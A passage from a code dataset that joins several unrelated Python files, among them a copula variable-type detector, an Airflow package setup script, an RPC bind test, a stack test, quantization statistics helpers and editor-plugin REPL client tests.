p = X.shape[1]
# boolean indexing
var_type = self.get_vartype_indices(X)
# if there are pre-fixed variable types, modify var_type_list to be consistent
_merged_var = var_type.copy()
for name, values in self.var_type_dict.items():
_merged_var[values] = name
_diff = _merged_var != var_type
if any(_diff):
if self._verbose > 1:
print('Caution: the user specified variable types differ from the models automatic decision')
loc = np.flatnonzero(_diff)
print(f'Conflicts at {loc}: user decision {_merged_var[loc]}, model decision {var_type[loc]}')
var_type = _merged_var
# indexing differenting continuous and non-continuous
self._cont_indices = var_type == 'continuous'
self._ord_indices = ~self._cont_indices
# integer based indexing
self.cont_indices = np.flatnonzero(self._cont_indices)
self.ord_indices = np.flatnonzero(self._ord_indices)
# set
var_type_dict = defaultdict(list)
for i,x in enumerate(var_type):
var_type_dict[x].append(i)
for key,value in self.var_type_dict.items():
if key not in var_type_dict:
raise
new_value = var_type_dict[key]
if not set(value).issubset(set(new_value)):
print(key, set(value), set(new_value))
raise
self.var_type_dict = var_type_dict
def get_vartype_indices(self, X):
"""
get's the indices of continuos columns by returning
those indicies which have at least max_ord distinct values
Parameters
----------
X: array-like of shape (nsamples, nfeatures)
input matrix
Returns:
var_type_list: list of str of length nfeatures
The specified variable types. Each element is one of var_type_names.
"""
def is_cont_using_counts(counts):
'''
return if continuous
'''
return len(counts)>0 and counts.max()/counts.sum() < self._min_ord_ratio
def is_special_type(x):
'''
return if is general-ordinal (not continuous), lower_truncated, upper_truncated, twosided truncated
'''
obs = ~np.isnan(x)
x = x[obs]
n = len(x)
uniques, counts = np.unique(x, return_counts=True)
if len(counts) == 1:
print('Remove variables with only a single observed level.')
raise
#below_max_ord = len(uniques) <= self._max_ord
is_ord = (counts.max()/n) >= self._min_ord_ratio
lower_truncated_thre = counts[0]/n >= self._min_ord_ratio
upper_truncated_thre = counts[-1]/n >= self._min_ord_ratio
is_lower_truncated = False
if lower_truncated_thre:
is_lower_truncated = is_cont_using_counts(counts[1:])
is_upper_truncated = False
if upper_truncated_thre:
is_upper_truncated = is_cont_using_counts(counts[:-1])
is_twoside_truncated = False
if lower_truncated_thre and upper_truncated_thre:
# test if the remaing values could be treated as continuous after removing truncated values
is_twoside_truncated = is_cont_using_counts(counts[1:-1])
assert is_twoside_truncated + is_lower_truncated + is_upper_truncated <= 1
return is_ord, is_lower_truncated, is_upper_truncated, is_twoside_truncated
def which_type(is_ord, is_lower_truncated, is_upper_truncated, is_twoside_truncated):
'''
determine the variable type
'''
if is_ord:
if is_lower_truncated:
t = 'lower_truncated'
elif is_upper_truncated:
t = 'upper_truncated'
elif is_twoside_truncated:
t = 'twosided_truncated'
else:
t = 'ordinal'
else:
t = 'continuous'
return t
ord_indices = []
lower_truncated_indices = []
upper_truncated_indices = []
twoside_truncated_indices = []
var_type_list = []
for i, col in enumerate(X.T):
is_ord, is_lower_truncated, is_upper_truncated, is_twoside_truncated = is_special_type(col)
var_type_list.append(which_type(is_ord, is_lower_truncated, is_upper_truncated, is_twoside_truncated))
var_type_list = np.array(var_type_list, dtype = 'U20')
return var_type_list
def _set_n_iter(self, converged, i):
'''
Store the number of iterations run
'''
if self._verbose>0:
if not converged:
print("Convergence not achieved at maximum iterations")
else:
print(f"Convergence achieved at iteration {i+1}")
self.n_iter_ = i+1
def _update_corr_diff(self, corr_diff, output=None):
'''
Compute and store correlation update
Parameters
----------
corr_diff: dict
Have self._corr_diff_type as keys
output: dict or None
If None, set to self.corr_diff
'''
if output is None:
to_append = self.corr_diff
else:
# TODO: also check dict names
assert isinstance(output, dict)
to_append = output
for t in self._corr_diff_type:
to_append[t].append(corr_diff[t])
def get_matrix_diff(self, sigma_old, sigma_new, type = ['F', 'S', 'N']):
'''
Return the correlation change tracking statistics, as some matrix norm of normalized matrix difference.
Support three norms currently: 'F' for Frobenius norm, 'S' for spectral norm and 'N' for nuclear norm.
User-defined norm can also be used through simple modification.
Parameters
----------
simga_old: array-like of shape (nfeatures, nfeatures)
the estimate of copula correlation matrix based on historical data
sigma_new: array-like of shape (nfeatures, nfeatures)
the estiamte of copula correlation matrix based on new batch data
type: list of str
a subset of {'F', 'S', 'N'}
the type of matrix norm to use for constructing test statistics.
Returns
-------
test_stats: dict
have (matrix norm type, the test statistics) as (key, value) pair.
'''
p = sigma_old.shape[0]
u, s, vh = np.linalg.svd(sigma_old)
factor = (u * np.sqrt(1/s) ) @ vh
diff = factor @ sigma_new @ factor
test_stats = {}
if 'F' in type:
test_stats['F'] = np.linalg.norm(diff-np.identity(p))
if 'S' in type or 'N' in type:
_, s, _ = np.linalg.svd(diff)
if 'S' in type:
test_stats['S'] = max(abs(s-1))
if 'N' in type:
test_stats['N'] = np.sum(abs(s-1))
return test_stats
| 43.02796 | 309 | 0.585953 |
4a27f0991bd31104f17f258a92f228eaee27c2e7 | 3,103 | py | Python | modules/dbnd-airflow/setup.py | dmytrostriletskyi/dbnd | d4a5f5167523e80439c9d64182cdc87b40cbc48f | [
"Apache-2.0"
] | null | null | null | modules/dbnd-airflow/setup.py | dmytrostriletskyi/dbnd | d4a5f5167523e80439c9d64182cdc87b40cbc48f | [
"Apache-2.0"
] | null | null | null | modules/dbnd-airflow/setup.py | dmytrostriletskyi/dbnd | d4a5f5167523e80439c9d64182cdc87b40cbc48f | [
"Apache-2.0"
] | null | null | null | from os import path
import setuptools
from setuptools.config import read_configuration
BASE_PATH = path.dirname(__file__)
CFG_PATH = path.join(BASE_PATH, "setup.cfg")
config = read_configuration(CFG_PATH)
version = config["metadata"]["version"]
requirements_for_airflow = [
"WTForms<2.3.0", # fixing ImportError: cannot import name HTMLString at 2.3.0
"Werkzeug<1.0.0,>=0.15.0",
"psycopg2-binary>=2.7.4",
"SQLAlchemy==1.3.18", # Make sure Airflow uses SQLAlchemy 1.3.15, Airflow is incompatible with SQLAlchemy 1.4.x
"marshmallow<3.0.0,>=2.18.0",
"marshmallow-sqlalchemy<0.24.0,>=0.16.1;python_version>='3.0'",
"itsdangerous<2.0,>=0.24",
"tenacity>=4.12",
]
setuptools.setup(
name="dbnd-airflow",
package_dir={"": "src"},
install_requires=["dbnd==" + version, "packaging",],
# Only for orchestration, tracking users should install Airflow manually before DBND
# The best way to install airflow is manually with constraints beforehand.
# For example:
# pip install apache-airflow --constraint "https://raw.githubusercontent.com/apache/airflow/constraints-${AIRFLOW_VERSION}/constraints-{PYTHON_VERSION}.txt
extras_require=dict(
airflow_1_10_7=requirements_for_airflow + ["apache-airflow==1.10.7"],
airflow_1_10_8=requirements_for_airflow + ["apache-airflow==1.10.8"],
airflow_1_10_9=requirements_for_airflow + ["apache-airflow==1.10.9"],
airflow_1_10_10=requirements_for_airflow + ["apache-airflow==1.10.10"],
airflow_1_10_11=requirements_for_airflow + ["apache-airflow==1.10.11"],
airflow_1_10_12=requirements_for_airflow + ["apache-airflow==1.10.12"],
airflow_1_10_13=requirements_for_airflow + ["apache-airflow==1.10.13"],
airflow_1_10_14=requirements_for_airflow + ["apache-airflow==1.10.14"],
airflow_1_10_15=requirements_for_airflow + ["apache-airflow==1.10.15"],
airflow_2_0_2=[
# This is only used to build Docker image for integration tests.
"WTForms<2.3.0",
"psycopg2-binary>=2.7.4",
"apache-airflow==2.0.2",
"apache-airflow-providers-apache-spark==1.0.3",
# Airflow 2.0 installs versions 3.3.5 which has bad dependency to newer version of importlib-metadata
"Markdown==3.3.4",
],
airflow_2_2_3=[
# This is only used to build Docker image for integration tests.
"WTForms<2.3.0",
"psycopg2-binary>=2.7.4",
"apache-airflow==2.2.3",
# Airflow 2.0 installs versions 3.3.5 which has bad dependency to newer version of importlib-metadata
"Markdown==3.3.4",
"apache-airflow-providers-apache-spark",
],
airflow=requirements_for_airflow + ["apache-airflow==1.10.10"],
tests=[
# # airflow support
"dbnd_test_scenarios==" + version,
"pytest==4.5.0",
"boto3<=1.15.18",
"mock",
"sh",
],
),
entry_points={"dbnd": ["dbnd-airflow = dbnd_airflow._plugin"],},
)
| 42.506849 | 160 | 0.643248 |
4a27f12ea41bbbc50f94fda7f6ce37f2af654098 | 6,425 | py | Python | test/functional/rpc_bind.py | Jurdefur/dhb-core | 9d9d5ce6be37f07fd14c98abcfa0b3435c5d2211 | [
"MIT"
] | null | null | null | test/functional/rpc_bind.py | Jurdefur/dhb-core | 9d9d5ce6be37f07fd14c98abcfa0b3435c5d2211 | [
"MIT"
] | null | null | null | test/functional/rpc_bind.py | Jurdefur/dhb-core | 9d9d5ce6be37f07fd14c98abcfa0b3435c5d2211 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2014-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test running dhbcoind with the -rpcbind and -rpcallowip options."""
import sys
from test_framework.netutil import all_interfaces, addr_to_hex, get_bind_addrs, test_ipv6_local
from test_framework.test_framework import BitcoinTestFramework, SkipTest
from test_framework.util import assert_equal, assert_raises_rpc_error, get_rpc_proxy, rpc_port, rpc_url
class RPCBindTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.bind_to_localhost_only = False
self.num_nodes = 1
def setup_network(self):
self.add_nodes(self.num_nodes, None)
def add_options(self, parser):
parser.add_argument("--ipv4", action='store_true', dest="run_ipv4", help="Run ipv4 tests only", default=False)
parser.add_argument("--ipv6", action='store_true', dest="run_ipv6", help="Run ipv6 tests only", default=False)
parser.add_argument("--nonloopback", action='store_true', dest="run_nonloopback", help="Run non-loopback tests only", default=False)
def run_bind_test(self, allow_ips, connect_to, addresses, expected):
'''
Start a node with requested rpcallowip and rpcbind parameters,
then try to connect, and check if the set of bound addresses
matches the expected set.
'''
self.log.info("Bind test for %s" % str(addresses))
expected = [(addr_to_hex(addr), port) for (addr, port) in expected]
base_args = ['-disablewallet', '-nolisten']
if allow_ips:
base_args += ['-rpcallowip=' + x for x in allow_ips]
binds = ['-rpcbind='+addr for addr in addresses]
self.nodes[0].rpchost = connect_to
self.start_node(0, base_args + binds)
pid = self.nodes[0].process.pid
assert_equal(set(get_bind_addrs(pid)), set(expected))
self.stop_nodes()
def run_allowip_test(self, allow_ips, rpchost, rpcport):
'''
Start a node with rpcallow IP, and request getnetworkinfo
at a non-localhost IP.
'''
self.log.info("Allow IP test for %s:%d" % (rpchost, rpcport))
node_args = \
['-disablewallet', '-nolisten'] + \
['-rpcallowip='+x for x in allow_ips] + \
['-rpcbind='+addr for addr in ['127.0.0.1', "%s:%d" % (rpchost, rpcport)]] # Bind to localhost as well so start_nodes doesn't hang
self.nodes[0].rpchost = None
self.start_nodes([node_args])
# connect to node through non-loopback interface
node = get_rpc_proxy(rpc_url(self.nodes[0].datadir, 0, "%s:%d" % (rpchost, rpcport)), 0, coveragedir=self.options.coveragedir)
node.getnetworkinfo()
self.stop_nodes()
def run_test(self):
# due to OS-specific network stats queries, this test works only on Linux
if sum([self.options.run_ipv4, self.options.run_ipv6, self.options.run_nonloopback]) > 1:
raise AssertionError("Only one of --ipv4, --ipv6 and --nonloopback can be set")
self.log.info("Check for linux")
if not sys.platform.startswith('linux'):
raise SkipTest("This test can only be run on linux.")
self.log.info("Check for ipv6")
have_ipv6 = test_ipv6_local()
if not have_ipv6 and not (self.options.run_ipv4 or self.options.run_nonloopback):
raise SkipTest("This test requires ipv6 support.")
self.log.info("Check for non-loopback interface")
self.non_loopback_ip = None
for name,ip in all_interfaces():
if ip != '127.0.0.1':
self.non_loopback_ip = ip
break
if self.non_loopback_ip is None and self.options.run_nonloopback:
raise SkipTest("This test requires a non-loopback ip address.")
self.defaultport = rpc_port(0)
if not self.options.run_nonloopback:
self._run_loopback_tests()
if not self.options.run_ipv4 and not self.options.run_ipv6:
self._run_nonloopback_tests()
def _run_loopback_tests(self):
if self.options.run_ipv4:
# check only IPv4 localhost (explicit)
self.run_bind_test(['127.0.0.1'], '127.0.0.1', ['127.0.0.1'],
[('127.0.0.1', self.defaultport)])
# check only IPv4 localhost (explicit) with alternative port
self.run_bind_test(['127.0.0.1'], '127.0.0.1:32171', ['127.0.0.1:32171'],
[('127.0.0.1', 32171)])
# check only IPv4 localhost (explicit) with multiple alternative ports on same host
self.run_bind_test(['127.0.0.1'], '127.0.0.1:32171', ['127.0.0.1:32171', '127.0.0.1:32172'],
[('127.0.0.1', 32171), ('127.0.0.1', 32172)])
else:
# check default without rpcallowip (IPv4 and IPv6 localhost)
self.run_bind_test(None, '127.0.0.1', [],
[('127.0.0.1', self.defaultport), ('::1', self.defaultport)])
# check default with rpcallowip (IPv4 and IPv6 localhost)
self.run_bind_test(['127.0.0.1'], '127.0.0.1', [],
[('127.0.0.1', self.defaultport), ('::1', self.defaultport)])
# check only IPv6 localhost (explicit)
self.run_bind_test(['[::1]'], '[::1]', ['[::1]'],
[('::1', self.defaultport)])
# check both IPv4 and IPv6 localhost (explicit)
self.run_bind_test(['127.0.0.1'], '127.0.0.1', ['127.0.0.1', '[::1]'],
[('127.0.0.1', self.defaultport), ('::1', self.defaultport)])
def _run_nonloopback_tests(self):
self.log.info("Using interface %s for testing" % self.non_loopback_ip)
# check only non-loopback interface
self.run_bind_test([self.non_loopback_ip], self.non_loopback_ip, [self.non_loopback_ip],
[(self.non_loopback_ip, self.defaultport)])
# Check that with invalid rpcallowip, we are denied
self.run_allowip_test([self.non_loopback_ip], self.non_loopback_ip, self.defaultport)
assert_raises_rpc_error(-342, "non-JSON HTTP response with '403 Forbidden' from server", self.run_allowip_test, ['1.1.1.1'], self.non_loopback_ip, self.defaultport)
if __name__ == '__main__':
RPCBindTest().main()
| 49.423077 | 172 | 0.633152 |
4a27f1876c51fdb5bb1c33a71cf4d6858bd15f89 | 952 | py | Python | tests/test_stack.py | AjithPanneerselvam/algo | e73402dbcd9c0ab7856a36d3a3703a5cc2897cd2 | [
"MIT"
] | 2 | 2017-07-10T08:55:01.000Z | 2018-05-26T07:53:58.000Z | tests/test_stack.py | AjithPanneerselvam/algo | e73402dbcd9c0ab7856a36d3a3703a5cc2897cd2 | [
"MIT"
] | 5 | 2017-03-19T10:01:23.000Z | 2017-08-31T07:00:19.000Z | tests/test_stack.py | AjithPanneerselvam/algo | e73402dbcd9c0ab7856a36d3a3703a5cc2897cd2 | [
"MIT"
] | 3 | 2016-09-27T15:09:54.000Z | 2017-08-31T03:34:47.000Z | """
module test_stack
~~~~~~~~~~~~~~
Tests for the stack data structure.
:copyright: (c) 2017 by 0xE8551CCB.
:license: MIT, see LICENSE for more details.
"""
import pytest
from pyalgorithm.datastructures.stack import DequeStack, ListStack
@pytest.fixture(params=[DequeStack, ListStack])
def stack(request):
return request.param()
def test_stack(stack):
stack.push(10)
stack.push(11)
stack.push(12)
assert 12 == stack.peek()
assert 3 == len(stack)
assert stack.is_empty() is False
assert 12 == stack.pop()
assert 11 == stack.pop()
assert 10 == stack.pop()
assert stack.is_empty() is True
import pytest
with pytest.raises(IndexError):
stack.pop()
stack.push(0)
stack.push(1)
assert stack.is_empty() is False
stack.clear()
assert stack.is_empty() is True
if __name__ == '__main__':
test_stack(DequeStack())
test_stack(ListStack())
| 20.255319 | 66 | 0.643908 |
4a27f356b1e35204d8213d72f0fe2873217f3413 | 7,820 | py | Python | tools/nntool/utils/stats_funcs.py | 00-01/gap_sdk | 25444d752b26ccf0b848301c381692d77172852c | [
"Apache-2.0"
] | 118 | 2018-05-22T08:45:59.000Z | 2022-03-30T07:00:45.000Z | tools/nntool/utils/stats_funcs.py | 00-01/gap_sdk | 25444d752b26ccf0b848301c381692d77172852c | [
"Apache-2.0"
] | 213 | 2018-07-25T02:37:32.000Z | 2022-03-30T18:04:01.000Z | tools/nntool/utils/stats_funcs.py | 00-01/gap_sdk | 25444d752b26ccf0b848301c381692d77172852c | [
"Apache-2.0"
] | 76 | 2018-07-04T08:19:27.000Z | 2022-03-24T09:58:05.000Z | # Copyright (C) 2020 GreenWaves Technologies, SAS
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
import math
import numpy as np
import scipy.spatial.distance as dis
STATS_BITS = [8, 16, 32]
def range_twos_complement(bits):
return (math.pow(-2, bits - 1), math.pow(2, bits - 1) - 1)
def calc_bits(*args, signed=True):
assert signed or all(arg >= 0 for arg in args), "numeric error"
if len(args) == 2:
num = np.floor(np.maximum(np.abs(args[0]), np.abs(args[1])))
else:
num = np.floor(np.abs(args[0]))
if num == 0:
return (1 if signed else 0)
return int(np.floor(np.log2(num)) + 1 + (1 if signed else 0))
def do_stat(npa, do_bits=True, channel_dim=None, all_channel_range=None):
mean = float(np.mean(npa))
std = float(np.std(npa))
amax = float(np.amax(npa))
amin = float(np.amin(npa))
quant1_3 = np.quantile(npa, [0.25, 0.75])
iqr = quant1_3[1] - quant1_3[0]
weak_min = (npa < quant1_3[0] - 1.5 * iqr)
weak_max = (npa > quant1_3[1] + 1.5 * iqr)
strong_min = (npa < quant1_3[0] - 3 * iqr)
strong_max = (npa > quant1_3[1] + 3 * iqr)
weak_count = int((weak_min | weak_max).sum())
strong_count = int((strong_min|strong_max).sum())
if weak_count:
min_out = float(np.min(np.abs(npa[weak_min|weak_max])))
if strong_count:
max_out = float(np.max(np.abs(npa[strong_min|strong_max])))
else:
max_out = float(np.max(np.abs(npa[weak_min|weak_max])))
else:
min_out = max_out = 0
ret = {
'mean': mean,
'std': std,
'min': amin,
'max': amax,
'size': npa.size,
'wols': weak_count,
'sols': strong_count,
'min_out' : min_out,
'max_out' : max_out,
}
if do_bits:
ret['ibits'] = calc_bits(amax, amin)
# all_channel_range must not be 0
if all_channel_range and npa.size > 1:
if channel_dim is not None:
# there is no point to this if there is only one item per channel
if not all(npa.shape[axis] == 1 if axis != channel_dim else True for axis in range(len(npa.shape))):
dims = tuple(dim for dim in range(len(npa.shape)) if dim != channel_dim)
ret['avg_prec'] = np.average(np.ptp(npa, axis=dims)/all_channel_range)
else:
ret['avg_prec'] = np.ptp(npa)/all_channel_range
return ret
def astats(npa, do_bits=True, channel_dim=None, channel_details=None):
"""Extracts statistics from a tensor
"""
all_channel_range = np.ptp(npa)
ret = do_stat(npa, do_bits=do_bits, channel_dim=channel_dim, all_channel_range=all_channel_range)
if channel_details and channel_dim is not None:
idx = [slice(None) for dim in npa.shape]
channel_data = []
for channel in range(npa.shape[channel_dim]):
idx[channel_dim] = slice(channel, channel + 1)
channel_data.append(do_stat(npa[tuple(idx)], do_bits=True, all_channel_range=all_channel_range))
ret['channel_stats'] = channel_data
return ret
def max_error(orig, quant):
qerr = orig - quant
return np.max(np.abs(qerr))
def qsnr(orig, quant, axis=None):
"""Calculate the QSNR between two tensors
"""
qerr = orig - quant
if axis is not None:
axis = tuple(i for i in range(len(qerr.shape)) if i != axis)
asum_err = np.sum(qerr * qerr, axis=axis)
asum_orig = np.sum(orig * orig, axis=axis)
res = []
if axis is not None:
for sum_err, sum_orig in zip(asum_err, asum_orig):
if sum_err > 0:
if sum_orig < sum_err:
if sum_orig == 0:
res.append(-math.inf)
else:
# Means error is larger than signal
res.append(-int(round(10 * math.log10(sum_err/sum_orig), 0)))
else:
# Error portion of signal
res.append(int(round(10 * math.log10(sum_orig/sum_err), 0)))
else:
# Means no error
res.append(math.inf)
return np.array(res)
else:
if asum_err > 0:
if asum_orig < asum_err:
if asum_orig == 0:
return -math.inf
else:
# Means error is larger than signal
return -int(round(10 * math.log10(asum_err/asum_orig), 0))
# Error portion of signal
return int(round(10 * math.log10(asum_orig/asum_err), 0))
# Means no error
return math.inf
def cos_similarity(x, y):
x = x.copy().flatten()
y = y.copy().flatten()
if np.sum(np.abs(x)) == 0 or np.sum(np.abs(y)) == 0:
x = np.add(x, 1e-5)
y = np.add(y, 1e-5)
return 1 - dis.cosine(x, y)
def calculate_qsnr(npa, bit_size, frac_bits):
"""Calculate the QSNR when a tensor is quantized
"""
qnpa = np.floor((npa * 2.0 ** frac_bits) + 0.5)
max_value = 2**(bit_size - 1) - 1
min_value = -max_value - 1
qnpa = np.clip(qnpa, min_value, max_value)
qnpa = (qnpa / 2.0 ** frac_bits)
return qsnr(npa, qnpa)
def calculate_qsnrs(npa, ideal_ibits, force_ideal=False):
""""Walk away from the ideal whole bit representation to see if
there is something better around it.
"""
store = {}
def get_qsnr(npa, bit_size, frac_bits):
""" Don't recalculate values we already have
"""
nonlocal store
if frac_bits < 0 or frac_bits >= bit_size:
return -math.inf
if frac_bits not in store:
store[frac_bits] = calculate_qsnr(npa, bit_size, frac_bits)
return store[frac_bits]
qstats = {}
# Already quantized
if not np.issubdtype(npa.dtype, np.floating):
return qstats
for bit_size in STATS_BITS:
frac_bits = min(max(bit_size - ideal_ibits, 0), bit_size - 1)
if force_ideal:
get_qsnr(npa, bit_size, frac_bits)
else:
while True:
t_low = get_qsnr(npa, bit_size, frac_bits - 1)
t_mid = get_qsnr(npa, bit_size, frac_bits)
t_high = -100 if frac_bits + 1 >= bit_size\
else get_qsnr(npa, bit_size, frac_bits + 1)
if t_low > t_mid:
frac_bits -= 1
elif t_high > t_mid:
frac_bits += 1
else:
break
qstats[bit_size] = {'q': frac_bits, 'qsnr': store[frac_bits]}
store.clear()
return qstats
def closest_greater(v):
for i in STATS_BITS:
if v <= i:
return i
return STATS_BITS[-1]
# def get_quantization(stats, min_qsnr, force_width):
# qstats = stats['qstats']
# if force_width is not None:
# return QType(bits=force_width, q=qstats[force_width]['q'], signed=True)
# for width in STATS_BITS:
# if qstats[width]['qsnr'] > min_qsnr:
# return QType(bits=width, q=qstats[width]['q'], signed=True)
# raise ValueError("no solution for this QSNR could be found")
def get_current_qsnr(stats, width):
return stats['qstats'][width]['qsnr']
| 35.384615 | 112 | 0.590665 |
4a27f493a0d095f1a2d3ca1d16f2d2abd31ae7a1 | 17,544 | py | Python | tests/test_package.py | pedrorgirardi/Tutkain | 3cbb6c8999279ea5da2bb2f656a45ac3693b7f0e | [
"Apache-2.0"
] | null | null | null | tests/test_package.py | pedrorgirardi/Tutkain | 3cbb6c8999279ea5da2bb2f656a45ac3693b7f0e | [
"Apache-2.0"
] | null | null | null | tests/test_package.py | pedrorgirardi/Tutkain | 3cbb6c8999279ea5da2bb2f656a45ac3693b7f0e | [
"Apache-2.0"
] | null | null | null | import queue
from Tutkain.api import edn
from Tutkain.package import source_root, start_logging, stop_logging
from Tutkain.src.repl import views
from Tutkain.src.repl.client import BabashkaClient, JVMClient, JSClient
from Tutkain.src import base64
from Tutkain.src import state
from .mock import Server
from .util import ViewTestCase
class TestJVMClient(ViewTestCase):
@classmethod
def conduct_handshake(self):
server = self.server
# Client starts clojure.main/repl
server.recv()
# Client switches into the bootstrap namespace
server.recv()
server.send("nil\n")
# Client defines load-base64 function
server.recv()
server.send("#'tutkain.bootstrap/load-base64\n")
# Client loads modules
server.recv()
server.send("#'tutkain.format/pp-str")
server.recv()
server.send("#'tutkain.backchannel/open")
server.recv()
server.send("#'tutkain.repl/repl")
server.recv()
with Server() as backchannel:
server.send({
edn.Keyword("tag"): edn.Keyword("ret"),
edn.Keyword("val"): f"""{{:host "localhost", :port {backchannel.port}}}""",
})
for _ in range(5):
backchannel.recv()
server.send({
edn.Keyword("tag"): edn.Keyword("out"),
edn.Keyword("val"): "Clojure 1.11.0-alpha1"
})
server.send({
edn.Keyword("tag"): edn.Keyword("ret"),
edn.Keyword("val"): "nil",
edn.Keyword("ns"): "user",
edn.Keyword("ms"): 0,
edn.Keyword("form"): """(println "Clojure" (clojure-version))"""
})
server.recv()
# Clojure version info is printed on the client
self.client.printq.get(timeout=5)
return backchannel
@classmethod
def setUpClass(self):
super().setUpClass()
start_logging(False)
def write_greeting(buf):
buf.write("user=> ")
buf.flush()
self.server = Server(greeting=write_greeting).start()
self.client = JVMClient(source_root(), self.server.host, self.server.port)
self.server.executor.submit(self.client.connect)
dialect = edn.Keyword("clj")
state.set_view_client(self.view, dialect, self.client)
repl_view = self.view.window().new_file()
views.configure(repl_view, dialect, self.client)
state.set_view_client(repl_view, dialect, self.client)
state.set_repl_view(repl_view, dialect)
self.backchannel = self.conduct_handshake()
@classmethod
def tearDownClass(self):
super().tearDownClass()
stop_logging()
if self.server:
self.server.stop()
if self.client:
self.client.halt()
def get_print(self):
return self.client.printq.get(timeout=5)
def print_item(self, ns, code):
return {
"printable": f"""{ns}=> {code}\n""",
"response": {
edn.Keyword("in"): f"""{code}"""
}
}
def eval_context(self, ns="user", file="NO_SOURCE_FILE", line=1, column=1):
actual = edn.read(self.backchannel.recv())
id = actual.get(edn.Keyword("id"))
response = edn.kwmap({
"id": id,
"op": edn.Keyword("set-eval-context"),
"file": file,
"line": line,
"column": column,
})
self.assertEquals(response, actual)
self.backchannel.send(edn.kwmap({
"id": id,
"file": file,
"ns": edn.Symbol(ns)
}))
def test_outermost(self):
self.set_view_content("(comment (inc 1) (inc 2))")
self.set_selections((9, 9), (17, 17))
self.view.run_command("tutkain_evaluate", {"scope": "outermost"})
self.eval_context(column=10)
self.eval_context(column=18)
self.assertEquals("(inc 1)\n", self.server.recv())
self.assertEquals("(inc 2)\n", self.server.recv())
def test_outermost_empty(self):
self.set_view_content("")
self.set_selections((0, 0))
self.view.run_command("tutkain_evaluate", {"scope": "outermost"})
self.assertRaises(queue.Empty, lambda: self.server.recvq.get_nowait())
def test_innermost(self):
self.set_view_content("(map inc (range 10))")
self.set_selections((9, 9))
self.view.run_command("tutkain_evaluate", {"scope": "innermost"})
self.eval_context(column=10)
self.assertEquals("(range 10)\n", self.server.recv())
self.assertEquals(self.print_item("user", "(range 10)"), self.get_print())
def test_form(self):
self.set_view_content("42 84")
self.set_selections((0, 0), (3, 3))
self.view.run_command("tutkain_evaluate", {"scope": "form"})
self.eval_context()
self.assertEquals(self.print_item("user", "42"), self.get_print())
self.eval_context(column=4)
self.assertEquals(self.print_item("user", "84"), self.get_print())
self.assertEquals("42\n", self.server.recv())
self.assertEquals("84\n", self.server.recv())
def test_parameterized(self):
self.set_view_content("{:a 1} {:b 2}")
self.set_selections((0, 0), (7, 7))
self.view.run_command("tutkain_evaluate", {"code": "((requiring-resolve 'clojure.data/diff) $0 $1)"})
self.eval_context()
self.assertEquals("((requiring-resolve 'clojure.data/diff) {:a 1} {:b 2})\n", self.server.recv())
def test_eval_in_ns(self):
self.view.run_command("tutkain_evaluate", {"code": "(reset)", "ns": "user"})
self.eval_context()
self.assertEquals(self.print_item("user", "(reset)"), self.get_print())
# Clients sends ns first
ret = self.server.recv()
self.assertTrue(ret.startswith("(do (or (some->> "))
self.assertEquals("(reset)\n", self.server.recv())
def test_ns(self):
self.set_view_content("(ns foo.bar) (ns baz.quux) (defn x [y] y)")
self.set_selections((0, 0))
self.view.run_command("tutkain_evaluate", {"scope": "ns"})
self.eval_context(ns="baz.quux")
self.assertEquals(self.print_item("user", "(ns foo.bar)"), self.get_print())
self.assertEquals("(ns foo.bar)\n", self.server.recv())
self.eval_context(ns="baz.quux", column=14)
self.assertEquals(self.print_item("user", "(ns baz.quux)"), self.get_print())
self.assertEquals("(ns baz.quux)\n", self.server.recv())
def test_view(self):
self.set_view_content("(ns foo.bar) (defn x [y] y)")
self.set_selections((0, 0))
self.view.run_command("tutkain_evaluate", {"scope": "view"})
response = edn.read(self.backchannel.recv())
self.assertEquals({
edn.Keyword("op"): edn.Keyword("load"),
edn.Keyword("code"): base64.encode("(ns foo.bar) (defn x [y] y)".encode("utf-8")),
edn.Keyword("file"): None,
edn.Keyword("id"): response.get(edn.Keyword("id"))
}, response)
def test_view_common(self):
self.view.assign_syntax("Packages/Tutkain/Clojure Common (Tutkain).sublime-syntax")
self.set_view_content("(ns foo.bar) (defn x [y] y)")
self.set_selections((0, 0))
self.view.run_command("tutkain_evaluate", {"scope": "view"})
response = edn.read(self.backchannel.recv())
self.assertEquals({
edn.Keyword("op"): edn.Keyword("load"),
edn.Keyword("code"): base64.encode("(ns foo.bar) (defn x [y] y)".encode("utf-8")),
edn.Keyword("file"): None,
edn.Keyword("id"): response.get(edn.Keyword("id"))
}, response)
def test_discard(self):
self.set_view_content("#_(inc 1)")
self.set_selections((2, 2))
self.view.run_command("tutkain_evaluate", {"scope": "innermost"})
self.eval_context(column=3)
self.assertEquals(self.print_item("user", "(inc 1)"), self.get_print())
self.assertEquals("(inc 1)\n", self.server.recv())
self.set_view_content("#_(inc 1)")
self.set_selections((2, 2))
self.view.run_command("tutkain_evaluate", {"scope": "outermost"})
self.eval_context(column=3)
self.assertEquals(self.print_item("user", "(inc 1)"), self.get_print())
self.assertEquals("(inc 1)\n", self.server.recv())
self.set_view_content("(inc #_(dec 2) 4)")
self.set_selections((14, 14))
self.view.run_command("tutkain_evaluate", {"scope": "innermost"})
self.eval_context(column=8)
self.assertEquals(self.print_item("user", "(dec 2)"), self.get_print())
self.assertEquals("(dec 2)\n", self.server.recv())
self.set_view_content("#_:a")
self.set_selections((2, 2))
self.view.run_command("tutkain_evaluate", {"scope": "form"})
self.eval_context(column=3)
self.assertEquals(self.print_item("user", ":a"), self.get_print())
self.assertEquals(":a\n", self.server.recv())
def test_lookup(self):
self.set_view_content("(rand)")
for n in range(1, 5):
self.set_selections((n, n))
self.view.run_command("tutkain_show_information", {
"selector": "variable.function"
})
response = edn.read(self.backchannel.recv())
self.assertEquals({
edn.Keyword("op"): edn.Keyword("lookup"),
edn.Keyword("named"): "rand",
edn.Keyword("ns"): None,
edn.Keyword("dialect"): edn.Keyword("clj"),
edn.Keyword("id"): response.get(edn.Keyword("id"))
}, response)
